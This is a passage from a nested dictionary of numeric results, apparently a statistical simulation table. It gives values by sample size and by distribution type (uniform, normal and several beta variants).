'beta1': 0.058951783674372704, 'beta2': 0.1401604284675425, 'beta4': 0.04709391177274086}, 500: {'uni': 0.07278161439913988, 'nor': 0.12078841684699831, 'beta1': 0.07292441980479603, 'beta2': 0.14450764888197143, 'beta4': 0.058999750381320826}, 400: {'uni': 0.08088169280004709, 'nor': 0.12433378065418932, 'beta1': 0.08132095020607566, 'beta2': 0.15222740175561678, 'beta4': 0.06647480909025247}, 300: {'uni': 0.0939218287454483, 'nor': 0.13477079040381174, 'beta1': 0.09374450977190885, 'beta2': 0.15925231238657545, 'beta4': 0.07809357504147704}, 200: {'uni': 0.11376771084448467, 'nor': 0.14849656103329123, 'beta1': 0.11448673216899263, 'beta2': 0.17267349109969787, 'beta4': 0.09768020272133693}, 150: {'uni': 0.13248417636554644, 'nor': 0.16487086808018317, 'beta1': 0.13201540731601635, 'beta2': 0.18463196235548684, 'beta4': 0.11564332215144385}, 100: {'uni': 0.15986880516145718, 'nor': 0.18568769522330097, 'beta1': 0.16083695049744096, 'beta2': 0.20763142518129513, 'beta4': 0.14518253285735372}, 75: {'uni': 0.18453989535605683, 'nor': 0.20888765477064086, 'beta1': 0.18449616472594121, 'beta2': 0.2273477267710795, 'beta4': 0.1717298602845287}, 50: {'uni': 0.225005258500509, 'nor': 0.2457096370841649, 'beta1': 0.2261275447013404, 'beta2': 0.2614753286995815, 'beta4': 0.21363887611658533}, 30: {'uni': 0.2895467650368521, 'nor': 0.30561459985547096, 'beta1': 0.28870673052245394, 'beta2': 0.3182687898914055, 'beta4': 0.2785792145404429}, 20: {'uni': 0.3510013380043752, 'nor': 0.3689369050495814, 'beta1': 0.35376596345288086, 'beta2': 0.3753745534011983, 'beta4': 0.34145606872993056}, 10: {'uni': 0.4879912533176197, 'nor': 0.49642038735952065, 'beta1': 0.48769549189795697, 'beta2': 0.5050788225647467, 'beta4': 0.4785566786480819}}, 100: {1000: {'uni': 0.05191039332270719, 'nor': 0.1245351360241278, 'beta1': 0.050997006206302875, 'beta2': 0.1460504259615869, 'beta4': 0.039905064803095525}, 750: {'uni': 0.05998871346519452, 'nor': 0.1294606683925581, 'beta1': 0.05847700732727823, 'beta2': 0.15021805913043595, 'beta4': 0.04601974795368319}, 500: {'uni': 0.07341973515609257, 'nor': 0.13531370556475342, 'beta1': 0.07268776551364053, 'beta2': 0.15390577989276166, 'beta4': 0.05694920670041542}, 400: {'uni': 0.08067103236103346, 'nor': 0.14321047014928123, 'beta1': 0.08067289579950143, 'beta2': 0.15985350854382507, 'beta4': 0.06537605030613047}, 300: {'uni': 0.09438397276573021, 'nor': 0.14904746557912396, 'beta1': 0.09398651936888375, 'beta2': 0.16721766000932792, 'beta4': 0.07618184832746211}, 200: {'uni': 0.11527057686285336, 'nor': 0.1642522242508767, 'beta1': 0.11389959855243442, 'beta2': 0.18023752667719684, 'beta4': 0.09672312219072954}, 150: {'uni': 0.13216312596618518, 'nor': 0.1751857316995788, 'beta1': 0.1302080010184946, 'beta2': 0.1927573270242654, 'beta4': 0.11238481899540864}, 100: {'uni': 0.16076877833678727, 'nor': 0.19975581943363707, 'beta1': 0.16079488576960266, 'beta2': 0.20995618985866715, 'beta4': 0.14127998845587303}, 75: {'uni': 0.18434632621362634, 'nor': 0.21848200560175463, 'beta1': 0.18642816894352734, 'beta2': 0.23061939766314457, 'beta4': 0.16533631802523197}, 50: {'uni': 0.22724922024813737, 'nor': 0.2584378792366021, 'beta1': 0.22695557193281157, 'beta2': 0.2675887560653766, 'beta4': 0.20740264516587753}, 30: {'uni': 0.2918722908611385, 'nor': 0.3155005347993203, 'beta1': 0.2926574234664835, 'beta2': 0.3225067701718885, 'beta4': 0.27375474423769725}, 20: {'uni': 0.3454149675998711, 'nor': 0.37444691882619846, 'beta1': 0.3534455881933011, 'beta2': 0.37908898284769055, 'beta4': 0.33782534459856733}, 10: {'uni': 0.48995308583601727, 'nor': 0.5057924764345054, 'beta1': 0.48712627773712436, 'beta2': 0.509289943720692, 'beta4': 0.4760256361246777}}, 75: {1000: {'uni': 0.05263806893207712, 'nor': 0.1426387862890096, 'beta1': 0.050861516064434786, 'beta2': 0.1550912428095914, 'beta4': 0.03942562584827963}, 750: {'uni': 0.05987895965521034, 'nor': 0.14543562438841662, 'beta1': 0.05843122916552068, 'beta2': 0.1621832342719166, 'beta4': 0.04641508440087805}, 500: {'uni': 0.0729716053027788, 'nor': 0.14981406322703128, 'beta1': 0.07136667899438129, 'beta2': 0.16497360040986309, 'beta4': 0.05736466968785836}, 400: {'uni': 0.08175178171124547, 'nor': 0.15594408152690709, 'beta1': 0.08094487541872952, 'beta2': 0.17052351554071665, 'beta4': 0.0643906104219426}, 300: {'uni': 0.09174467790257729, 'nor': 0.16325422501166353, 'beta1': 0.09381129166957458, 'beta2': 0.17484070317567046, 'beta4': 0.07488233712902187}, 200: {'uni': 0.11347575789530223, 'nor': 0.17663300299982598, 'beta1': 0.11326725293489726, 'beta2': 0.1883129177850832, 'beta4': 0.0942089295423881}, 150: {'uni': 0.131120018205924, 'nor': 0.19093489533419694, 'beta1': 0.13205247166475537, 'beta2': 0.19914811519378778, 'beta4': 0.11204039761886475}, 100: {'uni': 0.16082564475037464, 'nor': 0.20856290260278498, 'beta1': 0.1625220254469636, 'beta2': 0.22253364361870465, 'beta4': 0.13842685894102613}, 75: {'uni': 0.18769569670626118, 'nor': 0.22923558297249835, 'beta1': 0.18448259911628095, 'beta2': 0.23782557049636, 'beta4': 0.16392283350600595}, 50: {'uni': 0.22331353175762125, 'nor': 0.26715148642337594, 'beta1': 0.22668241788193566, 'beta2': 0.26824852802663934, 'beta4': 0.20334391006072833}, 30: {'uni': 0.289473862453717, 'nor': 0.3214887737505831, 'beta1': 0.2875485914729527, 'beta2': 0.32630978396412536, 'beta4': 0.2697829912702217}, 20: {'uni': 0.3511642946869532, 'nor': 0.3751483594090778, 'beta1': 0.352409931529952, 'beta2': 0.3784846745898291, 'beta4': 0.33540408314790005}, 10: {'uni': 0.488706375026184, 'nor': 0.5055985987947458, 'beta1': 0.4929217350189299, 'beta2': 0.5091039256808894, 'beta4': 0.4781596967150431}}, 50: {1000: {'uni': 0.054187095918339256, 'nor': 0.16627808992474102, 'beta1': 0.05074852615107739, 'beta2': 0.17412185904693311, 'beta4': 0.039691505151292106}, 750: {'uni': 0.062058115432295474, 'nor': 0.17238046742698188, 'beta1': 0.059084035023102, 'beta2': 0.17597952934137606, 'beta4': 0.04541331900508322}, 500: {'uni': 0.07423220817161519, 'nor': 0.1792687852250358, 'beta1': 0.07197857057706736, 'beta2': 0.1818195777041135, 'beta4': 0.05569462226316452}, 400: {'uni': 0.08254206840442069, 'nor': 0.1825333888879272, 'beta1': 0.08099479940703191, 'beta2': 0.18984048447922675, 'beta4': 0.06357941522010713}, 300: {'uni': 0.09474363323614166, 'nor': 0.18834315888900854, 'beta1': 0.09343612898219089, 'beta2': 0.1924669867698795, 'beta4': 0.07309401794651404}, 200: {'uni': 0.11623368179709986, 'nor': 0.20107102192718945, 'beta1': 0.1147080452043604, 'beta2': 0.20330128778291234, 'beta4': 0.09144934593281676}, 150: {'uni': 0.13323158697545257, 'nor': 0.2113741612304923, 'beta1': 0.13089326840146875, 'beta2': 0.21101409732714788, 'beta4': 0.1080905839738153}, 100: {'uni': 0.1610409156149188, 'nor': 0.23200918860179387, 'beta1': 0.16001862287729518, 'beta2': 0.23225218169591122, 'beta4': 0.13330220075686566}, 75: {'uni': 0.18275303987938896, 'nor': 0.2503116552370775, 'beta1': 0.18535594744801204, 'beta2': 0.2435558750806069, 'beta4': 0.15726325930804558}, 50: {'uni': 0.2246149371985376, 'nor': 0.2833867880515266, 'beta1': 0.22456825644221368, 'beta2': 0.27550623451671474, 'beta4': 0.1978109061797627}, 30: {'uni': 0.2872878605199388, 'nor': 0.3386232243962164, 'beta1': 0.28579575210477914, 'beta2': 0.33471410391675205, 'beta4': 0.26584890073856127}, 20: {'uni': 0.3523359671395369, 'nor': 0.3883193259633752, 'beta1': 0.34980199502356346, 'beta2': 0.38521307572061386, 'beta4': 0.32550253808599006}, 10: {'uni': 0.48543686550596693, 'nor': 0.5182694839209849, 'beta1': 0.49221988171682085, 'beta2': 0.5153967620456474, 'beta4': 0.4700594688479634}}, 30: {1000: {'uni': 0.058918924239352466, 'nor': 0.21297337163268276, 'beta1': 0.0518167432973049, 'beta2': 0.195446267914975, 'beta4': 0.03908638506448431}, 750: {'uni': 0.06572796327401753, 'nor': 0.21595057482420588, 'beta1': 0.059259512312420104, 'beta2': 0.19755323997975416, 'beta4': 0.045197433532028874}, 500: {'uni': 0.07686236514630335, 'nor': 0.22226563318166248, 'beta1': 0.07177928002902467, 'beta2': 0.2056526292300077, 'beta4': 0.05493149389715696}, 400: {'uni': 0.08465975831568184, 'nor': 0.2252684454523387, 'beta1': 0.08123930027330767, 'beta2': 0.2099099100664712, 'beta4': 0.06217418123201823}, 300: {'uni': 0.09651070474378282, 'nor': 0.2300730633949879, 'beta1': 0.09323619984546516, 'beta2': 0.2120833703149353, 'beta4': 0.07312418047556249}, 200: {'uni': 0.11605617135066404, 'nor': 0.2431502125103765, 'beta1': 0.11353867501894094, 'beta2': 0.21682074894377878, 'beta4': 0.08933031413363546}, 150: {'uni': 0.13410472341858543, 'nor': 0.24725518547910333, 'beta1': 0.1318999891275866, 'beta2': 0.22942799747160325, 'beta4': 0.10272810181706044}, 100: {'uni': 0.16196955748999547, 'nor': 0.2700012320341486, 'beta1': 0.15871486988261296, 'beta2': 0.24514818382512593, 'beta4': 0.13010131517540321}, 75: {'uni': 0.1835418878236575, 'nor': 0.28467491610667683, 'beta1': 0.18546450563511369, 'beta2': 0.26290322403314065, 'beta4': 0.15276528672305534}, 50: {'uni': 0.22509609698193117, 'nor': 0.3142329116082755, 'beta1': 0.22663224055326758, 'beta2': 0.2919325149774068, 'beta4': 0.18996462242195666}, 30: {'uni': 0.2897752445348868, 'nor': 0.359326156047137, 'beta1': 0.29020063665136886, 'beta2': 0.34273751996321067, 'beta4': 0.2529174520482719}, 20: {'uni': 0.344005648632975, 'nor': 0.42004384529396105, 'beta1': 0.34658611138046264, 'beta2': 0.3902673253680207, 'beta4': 0.31692923991569927}, 10: {'uni': 0.4837000884491306, 'nor': 0.5316468101838533, 'beta1': 0.48249080675172323, 'beta2': 0.5194341288716998, 'beta4': 0.4603664888921414}}, 20: {1000: {'uni': 0.06597487107762767, 'nor': 0.26293245683028, 'beta1': 0.05120820169191942, 'beta2': 0.22017115245446095, 'beta4': 0.038916881153397975}, 750: {'uni': 0.07269217456814536, 'nor': 0.2667557058726879, 'beta1': 0.059583644657734885, 'beta2': 0.2217993564160058, 'beta4': 0.04508243513408289}, 500: {'uni': 0.08323814797112672, 'nor': 0.2728795944957957, 'beta1': 0.07257265729126575, 'beta2': 0.2282291849514998, 'beta4': 0.055068233755242446}, 400: {'uni': 0.09072350595679135, 'nor': 0.2723668419179453, 'beta1': 0.08056174054012066, 'beta2': 0.22597367362057608, 'beta4': 0.06169261835040951}, 300: {'uni': 0.10083188986577823, 'nor': 0.27712117006626796, 'beta1': 0.09318059105121618, 'beta2': 0.23326141016132318, 'beta4': 0.07091172628182563}, 200: {'uni': 0.12110756732550038, 'nor': 0.2855441269934709, 'beta1': 0.1157486267208615, 'beta2': 0.23795719725720738, 'beta4': 0.08927441431005056}, 150: {'uni': 0.13598733501466506, 'nor': 0.2907323977734544, 'beta1': 0.13109115777861102, 'beta2': 0.25318192125603234, 'beta4': 0.10332852211836979}, 100: {'uni': 0.1639431522658722, 'nor': 0.31152417983746605, 'beta1': 0.16155024590107747, 'beta2': 0.262103768140855, 'beta4': 0.12609462698530394}, 75: {'uni': 0.18685165128081893, 'nor': 0.3254693717012144, 'beta1': 0.18397251726711683, 'beta2': 0.27915696455084993, 'beta4': 0.14785181380565982}, 50: {'uni': 0.22761062573955604, 'nor': 0.3522320739163892, 'beta1': 0.2256099922364685, 'beta2': 0.30883291813380065, 'beta4': 0.18365089973024573}, 30: {'uni': 0.289203483511623, 'nor': 0.4011670663050516, 'beta1': 0.2891477181429253, 'beta2': 0.35472219797014837, 'beta4': 0.24745951418710105}, 20: {'uni': 0.34667459614575846, 'nor': 0.44850723188809377, 'beta1': 0.35113197277916386, 'beta2': 0.4044647849108889, 'beta4': 0.3126967400538809}, 10: {'uni': 0.48476115016520405, 'nor': 0.554406017917817, 'beta1': 0.4817528515392736, 'beta2': 0.5313493222964868, 'beta4': 0.4483656416548137}}, 10: {1000: {'uni': 0.09689632012426586, 'nor': 0.37891222572877614, 'beta1': 0.09112144529033561, 'beta2': 0.2586988400624156, 'beta4': 0.03900835588583823}, 750: {'uni': 0.10064795489220457, 'nor': 0.383188375068864, 'beta1': 0.09112850229049962, 'beta2': 0.2640286285324004, 'beta4': 0.04502182335240068}, 500: {'uni': 0.10802210321588324, 'nor': 0.3884962880934829, 'beta1': 0.0911721599997744, 'beta2': 0.27079265676023156, 'beta4': 0.05453895677656284}, 400: {'uni': 0.11304279449008725, 'nor': 0.3889920925008913, 'beta1': 0.0912685747102537, 'beta2': 0.26870553332669633, 'beta4': 0.0616433432574133}, 300: {'uni': 0.12154400796026772, 'nor': 0.39206198235198325, 'beta1': 0.09483352592096467, 'beta2': 0.2724084181642078, 'beta4': 0.07113409099304874}, 200: {'uni': 0.1347088080476393, 'nor': 0.3989961151096316, 'beta1': 0.11465623517387658, 'beta2': 0.2801925598985867, 'beta4': 0.08778892448680453}, 150: {'uni': 0.14950650016574885, 'nor': 0.4074020676124349, 'beta1': 0.1319362581048737, 'beta2': 0.2882295441811764, 'beta4': 0.09979505237411807}, 100: {'uni': 0.1746199496093277, 'nor': 0.41995987192595596, 'beta1': 0.1606353579518667, 'beta2': 0.3046266455964683, 'beta4': 0.12499057927159085}, 75: {'uni': 0.1963173328176369, 'nor': 0.4305939349118369, 'beta1': 0.1853892160990983, 'beta2': 0.3141345572002111, 'beta4': 0.14329993044048847}, 50: {'uni': 0.23406933928651003, 'nor': 0.4528491146162036, 'beta1': 0.22664378023198406, 'beta2': 0.3345469784583225, 'beta4': 0.17784420010893143}, 30: {'uni': 0.29324923220629134, 'nor': 0.4874432234123751, 'beta1': 0.2893385819235859, 'beta2': 0.3762716610461486, 'beta4': 0.2340649401769095}, 20: {'uni': 0.35290644687931416, 'nor': 0.5339309604641884, 'beta1': 0.3494325720267195, 'beta2': 0.42149057999190237, 'beta4': 0.29349793334316515}, 10: {'uni': 0.4819570489345161, 'nor': 0.621282121995842, 'beta1': 0.48228312064803025, 'beta2': 0.531072925087128, 'beta4': 0.42676946077577815}}}, 0.05: {1000: {1000: {'uni': 0.04250873596535332, 'nor': 0.05211322056354162, 'beta1': 0.04306205955872783, 'beta2': 0.08035999046629705, 'beta4': 0.03797796698498185}, 750: {'uni': 0.04939044076050647, 'nor': 0.057928759168451305, 'beta1': 0.04956386512094496, 'beta2': 0.08255880301550844, 'beta4': 0.04460825923337863}, 500: {'uni': 0.060593693593500864, 'nor': 0.06752114560687372, 'beta1': 0.060391364928257474, 'beta2': 0.08816209252857421, 'beta4': 0.05607127534968437}, 400: {'uni': 0.0673055881110432, 'nor': 0.07339531978449776, 'beta1': 0.06742981404562332, 'beta2': 0.09222999610749227, 'beta4': 0.06293590114601089}, 300: {'uni': 0.07829316510351103, 'nor': 0.08373775958480117, 'beta1': 0.07775258426053894, 'beta2': 0.10010817811684236, 'beta4': 0.07394283107208066}, 200: {'uni': 0.09529933382323597, 'nor': 0.10000749443187817, 'beta1': 0.09514079230112737, 'beta2': 0.11393345537368338, 'beta4': 0.0917178764665584}, 150: {'uni': 0.1095050668662032, 'nor': 0.1131765255844498, 'beta1': 0.10961338251417468, 'beta2': 0.12625941180627626, 'beta4': 0.10701383836580813}, 100: {'uni': 0.13504293819410917, 'nor': 0.13789756284368515, 'beta1': 0.13448261128725092, 'beta2': 0.1469163714586994, 'beta4': 0.13105762405283972}, 75: {'uni': 0.15512998752952264, 'nor': 0.15736947708421162, 'beta1': 0.15460254067269846, 'beta2': 0.16654377290913044, 'beta4': 0.1511024290565549}, 50: {'uni': 0.18856009448236644, 'nor': 0.1906997936343151, 'beta1': 0.1884576993592476, 'beta2': 0.1982428759858742, 'beta4': 0.18622204644381843}, 30: {'uni': 0.2398807672306324, 'nor': 0.24412240717703027, 'beta1': 0.24053994368488707, 'beta2': 0.24870244801951652, 'beta4': 0.23887135097093648}, 20: {'uni': 0.29368464372283687, 'nor': 0.2955974928774556, 'beta1': 0.2925421511499017, 'beta2': 0.29823721632962963, 'beta4': 0.2937927014266898}, 10: {'uni': 0.40809844072326357, 'nor': 0.40905711558389374, 'beta1': 0.4074293842569355, 'beta2': 0.41442818653088903, 'beta4': 0.4102533723801786}}, 750: {1000: {'uni': 0.04313132347462212, 'nor': 0.055054467531027274, 'beta1': 0.042903624792836825, 'beta2': 0.08085753121993888, 'beta4': 0.037165583736955776}, 750: {'uni': 0.04934405850774021, 'nor': 0.06012658528358911, 'beta1': 0.04926360659177581, 'beta2': 0.08292295419216378, 'beta4': 0.04421364295003938}, 500: {'uni': 0.060341804714815095, 'nor': 0.07033647349548888, 'beta1': 0.060558717006613694, 'beta2': 0.08863522371969174, 'beta4': 0.05517938622481133}, 400: {'uni': 0.06747724189757476, 'nor': 0.07601553392118676, 'beta1': 0.06753738114806768, 'beta2': 0.09286935098393112, 'beta4': 0.06258866218729964}, 300: {'uni': 0.0779234041757913, 'nor': 0.08581112098260912, 'beta1': 0.07752436380641886, 'beta2': 0.10025969540588678, 'beta4': 0.0727070225966075}, 200: {'uni': 0.09529011628998052, 'nor': 0.10157134239672405, 'beta1': 0.09532196270657745, 'beta2': 0.114717619457614, 'beta4': 0.09084936265846794}, 150: {'uni': 0.10929839951597176, 'nor': 0.11416074257244094, 'beta1': 0.10964416703357704, 'beta2': 0.1261134555516631, 'beta4': 0.10586630629141039}, 100: {'uni': 0.13402537604739173, 'nor': 0.13946500057705635, 'beta1': 0.13339315942045915, 'beta2': 0.14779247908517917, 'beta4': 0.12987399411308242}, 75: {'uni': 0.15491927659856863, 'nor': 0.15726063343810553, 'beta1': 0.15463569652056147, 'beta2': 0.1679004949850389, 'beta4': 0.1524841664459506}, 50: {'uni': 0.18831823725744598, 'nor': 0.19163748416973814, 'beta1': 0.1884166302028113, 'beta2': 0.19811874878971442, 'beta4': 0.18759940893926474}, 30: {'uni': 0.24249816383380124, 'nor': 0.2448871814993652, 'beta1': 0.24185014536823451, 'beta2': 0.24980128317227762, 'beta4': 0.2421287830978741}, 20: {'uni': 0.2940118546518854, 'nor': 0.29331856753560476, 'beta1': 0.29360254728317475, 'beta2': 0.30182924197426564, 'beta4': 0.29353502143027616}, 10: {'uni': 0.4087141031810262, 'nor': 0.41170613228789243, 'beta1': 0.4094888928024222, 'beta2': 0.41617469535239165, 'beta4': 0.4111278779658915}}, 500: {1000: {'uni': 0.0429345704660003, 'nor': 0.05932234329262365, 'beta1': 0.042727156109620246, 'beta2': 0.08510210997179135, 'beta4': 0.036257982752805895}, 750: {'uni': 0.049265441580142344, 'nor': 0.06453072581186886, 'beta1': 0.04952462754419623, 'beta2': 0.0880626740533288, 'beta4': 0.04274970287381094}, 500: {'uni': 0.06051345692735122, 'nor': 0.07405810203028496, 'beta1': 0.06013137064686658, 'beta2': 0.09405433515075423, 'beta4': 0.05362451219159059}, 400: {'uni': 0.06726638579663013, 'nor': 0.0793534053635837, 'beta1': 0.06761300772776771, 'beta2': 0.0996414553379194, 'beta4': 0.061074275253972965}, 300: {'uni': 0.07752111447176113, 'nor': 0.08853014421612171, 'beta1': 0.07790127912387818, 'beta2': 0.10591589294909354, 'beta4': 0.07149101529018864}, 200: {'uni': 0.09553432289253411, 'nor': 0.10474513086458981, 'beta1': 0.09491138965654433, 'beta2': 0.11924936822193555, 'beta4': 0.089970363011452}, 150: {'uni': 0.11049256971537569, 'nor': 0.11834670194031227, 'beta1': 0.11055795759911412, 'beta2': 0.13284580636545373, 'beta4': 0.1045099293615413}, 100: {'uni': 0.1325888031595155, 'nor': 0.1416642277128064, 'beta1': 0.13487031887436052, 'beta2': 0.15320832506486431, 'beta4': 0.12989554029630124}, 75: {'uni': 0.15407104188981624, 'nor': 0.1599128393935123, 'beta1': 0.15374710784163467, 'beta2': 0.16941911839219415, 'beta4': 0.150389415793519}, 50: {'uni': 0.18908047311103032, 'nor': 0.19373367790298657, 'beta1': 0.18889964131492282, 'beta2': 0.20132986679665088, 'beta4': 0.1846732957113127}, 30: {'uni': 0.24226077908740745, 'nor': 0.24727230642152115, 'beta1': 0.24238358313543917, 'beta2': 0.2513661790960438, 'beta4': 0.23977316063110243}, 20: {'uni': 0.2932302698568148, 'nor': 0.2947506771756141, 'beta1': 0.2938361058917397, 'beta2': 0.30338566870485817, 'beta4': 0.2894081827795897}, 10: {'uni': 0.4095412142044333, 'nor': 0.41582272767182626, 'beta1': 0.4091307634899183, 'beta2': 0.41139636575315974, 'beta4': 0.4078258054114057}}, 400: {1000: {'uni': 0.04255614948733477, 'nor': 0.06271520295830779, 'beta1': 0.042499298590381596, 'beta2': 0.08456650823704548, 'beta4': 0.03580234989921294}, 750: {'uni': 0.04937518706328403, 'nor': 0.06777109574937312, 'beta1': 0.049367906001651085, 'beta2': 0.08730333067407448, 'beta4': 0.04221923686249307}, 500: {'uni': 0.06056747910036231, 'nor': 0.07722766386556512, 'beta1': 0.060303960376819954, 'beta2': 0.09289270953205328, 'beta4': 0.05248883908484214}, 400: {'uni': 0.06728484592171763, 'nor': 0.08236276990821306, 'beta1': 0.06746558979046141, 'beta2': 0.09825313200635855, 'beta4': 0.06025406262496252}, 300: {'uni': 0.07820323026110898, 'nor': 0.09073559074460608, 'beta1': 0.07821541358546946, 'beta2': 0.10636367292497817, 'beta4': 0.0707215219370873}, 200: {'uni': 0.09539601064885839, 'nor': 0.10556303670070322, 'beta1': 0.09561582053237683, 'beta2': 0.12180562887877411, 'beta4': 0.08801801823329147}, 150: {'uni': 0.10936714369824918, 'nor': 0.11926537223910565, 'beta1': 0.10969157845228705, 'beta2': 0.13244557387181255, 'beta4': 0.10341522850743123}, 100: {'uni': 0.13354393257412983, 'nor': 0.1423512660895025, 'beta1': 0.1349214446210324, 'beta2': 0.15303126855995564, 'beta4': 0.12836102685714074}, 75: {'uni': 0.1539128338395579, 'nor': 0.16324678205317678, 'beta1': 0.15405133046909722, 'beta2': 0.17098592920893618, 'beta4': 0.14957593956825316}, 50: {'uni': 0.18775635329386392, 'nor': 0.1937191005204043, 'beta1': 0.1884271730141419, 'beta2': 0.20435458644695162, 'beta4': 0.1843870264363775}, 30: {'uni': 0.24284157129386047, 'nor': 0.24629860436826123, 'beta1': 0.2408640216307077, 'beta2': 0.25171500005639674, 'beta4': 0.23632331131142947}, 20: {'uni': 0.294735259283024, 'nor': 0.3000105461174386, 'beta1': 0.29458072221349885, 'beta2': 0.3014785462051059, 'beta4': 0.2909045447121572}, 10: {'uni': 0.4103919628714764, 'nor': 0.41225052464658113, 'beta1': 0.41060821792134156, 'beta2': 0.4163793146371585, 'beta4': 0.40742898042098596}}, 300: {1000: {'uni': 0.042894438722122286, 'nor': 0.06804466454865021, 'beta1': 0.042975744332918175, 'beta2': 0.0888244060704032, 'beta4': 0.03506422723776037}, 750: {'uni': 0.04935072830414078, 'nor': 0.0725923011358739, 'beta1': 0.04961504811513984, 'beta2': 0.09140206098548131, 'beta4': 0.04167378331875227}, 500: {'uni': 0.06083268710478407, 'nor': 0.08079774711138776, 'beta1': 0.060462958380593346, 'beta2': 0.09864492613316656, 'beta4': 0.05224950308205284}, 400: {'uni': 0.06740667823442481, 'nor': 0.08662549045486634, 'beta1': 0.06812433004180829, 'beta2': 0.10449231525526514, 'beta4': 0.05889668522599231}, 300: {'uni': 0.07759043263185894, 'nor': 0.09466518723563278, 'beta1': 0.07761370429428577, 'beta2': 0.11256171095061174, 'beta4': 0.06901393087520213}, 200: {'uni': 0.09501186068000178, 'nor': 0.11045546634746517, 'beta1': 0.09545154794009353, 'beta2': 0.12529152669670096, 'beta4': 0.08590491171623238}, 150: {'uni': 0.10913769973038989, 'nor': 0.12308354696458895, 'beta1': 0.10968689772848039, 'beta2': 0.1357602716808839, 'beta4': 0.1014492424455633}, 100: {'uni': 0.13555693310048833, 'nor': 0.14414239978154153, 'beta1': 0.13509394899970356, 'beta2': 0.15724894818388713, 'beta4': 0.12712742588054968}, 75: {'uni': 0.1528796701368813, 'nor': 0.16337025975562974, 'beta1': 0.15343029335140113, 'beta2': 0.17613550383491916, 'beta4': 0.14800406699526014}, 50: {'uni': 0.18792883570862817, 'nor': 0.19765009586613413, 'beta1': 0.18912520193521853, 'beta2': 0.2052442637463902, 'beta4': 0.1817694823681486}, 30: {'uni': 0.24126343910617895, 'nor': 0.24731827586722788, 'beta1': 0.24270517877017284, 'beta2': 0.2557802201638789, 'beta4': 0.23627972110713036}, 20: {'uni': 0.2926059984655144, 'nor': 0.2986919482722732, 'beta1': 0.2923500002958017, 'beta2': 0.30460634421517385, 'beta4': 0.28973301373812854}, 10: {'uni': 0.4102473624031447, 'nor': 0.415040095717406, 'beta1': 0.4086610684156582, 'beta2': 0.41242893849078294, 'beta4': 0.40337056089025664}}, 200: {1000: {'uni': 0.04292620281905324, 'nor': 0.07789366288788169, 'beta1': 0.042909295701843875, 'beta2': 0.09598401017764835, 'beta4': 0.03444818222651283}, 750: {'uni': 0.049116893075300094, 'nor': 0.08192589013572071, 'beta1': 0.049261303877093376, 'beta2': 0.09942309864768661, 'beta4': 0.04066451451600811}, 500: {'uni': 0.06050980125495031, 'nor': 0.08870178975680876, 'beta1': 0.06019971884940478, 'beta2': 0.10568112520914552, 'beta4': 0.050818961275074126}, 400: {'uni': 0.06739439830856109, 'nor': 0.09366639653726616, 'beta1': 0.06764647221850328, 'beta2': 0.11327801797692638, 'beta4': 0.05737622556223043}, 300: {'uni': 0.07777244883862433, 'nor': 0.10218475647374542, 'beta1': 0.07789235265143774, 'beta2': 0.11913850063835685, 'beta4': 0.0674525332548831}, 200: {'uni': 0.09502704520860905, 'nor': 0.11604045896624948, 'beta1': 0.09510463516896728, 'beta2': 0.13172961091169733, 'beta4': 0.0847162185101194}, 150: {'uni': 0.11016636440205546, 'nor': 0.12811765905677236, 'beta1': 0.10970368873875014, 'beta2': 0.14331145199787, 'beta4': 0.09995453264910176}, 100: {'uni': 0.13445642653897671, 'nor': 0.1497382854380087, 'beta1': 0.13348683808905348, 'beta2': 0.16329669247250422, 'beta4': 0.12465846974308342}, 75: {'uni': 0.15419888978141394, 'nor': 0.16923478439093248, 'beta1': 0.1534954671086292, 'beta2': 0.17909152766875147, 'beta4': 0.14538034559889523}, 50: {'uni': 0.1867393471217101, 'nor': 0.19994040891868026, 'beta1': 0.18704772643881146, 'beta2': 0.20860701598862752, 'beta4': 0.18028390140578754}, 30: {'uni': 0.24085839007149673, 'nor': 0.25196638732921794, 'beta1': 0.2416028527023132, 'beta2': 0.258985786530043, 'beta4': 0.23484197182299332}, 20: {'uni': 0.2938289434391539, 'nor': 0.30183924391245415, 'beta1': 0.2929710538077763, 'beta2': 0.30847428056222437, 'beta4': 0.2887648891428266}, 10: {'uni': 0.409241850795313, 'nor': 0.41624360452445025, 'beta1': 0.4073016819406742, 'beta2': 0.41919073368911525, 'beta4': 0.4050765267408517}}, 150: {1000: {'uni': 0.04291723660518407, 'nor': 0.08563558848858943, 'beta1': 0.042846891281439425, 'beta2': 0.10223899504388945, 'beta4': 0.03395439572798897}, 750: {'uni': 0.04950013649203988, 'nor': 0.08925938870000594, 'beta1': 0.04965224665621104, 'beta2': 0.10696078885236882, 'beta4': 0.040016846887239776}, 500: {'uni': 0.06056262216642466, 'nor': 0.09643747097853617, 'beta1': 0.060400676674767784, 'beta2': 0.11473400680347212, 'beta4': 0.04951486955132711}, 400: {'uni': 0.06764529037263078, 'nor': 0.10144512010371015, 'beta1': 0.06753205660512529, 'beta2': 0.11877629190302957, 'beta4': 0.05635636540840383}, 300: {'uni': 0.07833927823257347, 'nor': 0.10837393046444554, 'beta1': 0.07800217882792032, 'beta2': 0.12395861166633126, 'beta4': 0.06599964488218174}, 200: {'uni': 0.09545996993358469, 'nor': 0.12238507175537305, 'beta1': 0.09520988149732268, 'beta2': 0.13705221967657688, 'beta4': 0.0834232463067639}, 150: {'uni': 0.10950500818109843, 'nor': 0.13336780634865708, 'beta1': 0.10925207483454008, 'beta2': 0.14838697874181017, 'beta4': 0.09817686727672598}, 100: {'uni': 0.13308106007624088, 'nor': 0.15584852299459984, 'beta1': 0.13507681514120773, 'beta2': 0.16768636533102133, 'beta4': 0.12178061197560497}, 75: {'uni': 0.15418797319776234, 'nor': 0.17295736209751258, 'beta1': 0.154058224278319, 'beta2': 0.1837034986222184, 'beta4': 0.14349011466146278}, 50: {'uni': 0.18847911332805245, 'nor': 0.20361778090060745, 'beta1': 0.1875078531942039, 'beta2': 0.21225663088149105, 'beta4': 0.17857036568803114}, 30: {'uni': 0.24059443804418118, 'nor': 0.2533108674087146, 'beta1': 0.24179550981403275, 'beta2': 0.26178390187576706, 'beta4': 0.23390865892313567}, 20: {'uni': 0.2937042322632649, 'nor': 0.3041869530968494, 'beta1': 0.29418747362409225, 'beta2': 0.3085038537053799, 'beta4': 0.28520167726380585}, 10: {'uni': 0.4096756554001893, 'nor': 0.4139326107135924, 'beta1': 0.40764137118865473, 'beta2': 0.4204038401226778, 'beta4': 0.40388108256901817}}, 100: {1000: {'uni': 0.04342664844495059, 'nor': 0.09884840155194324, 'beta1': 0.04276716681381737, 'beta2': 0.11054081774012758, 'beta4': 0.03371827577803044}, 750: {'uni': 0.049919916608987536, 'nor': 0.10252531304078716, 'beta1': 0.049091134507803946, 'beta2': 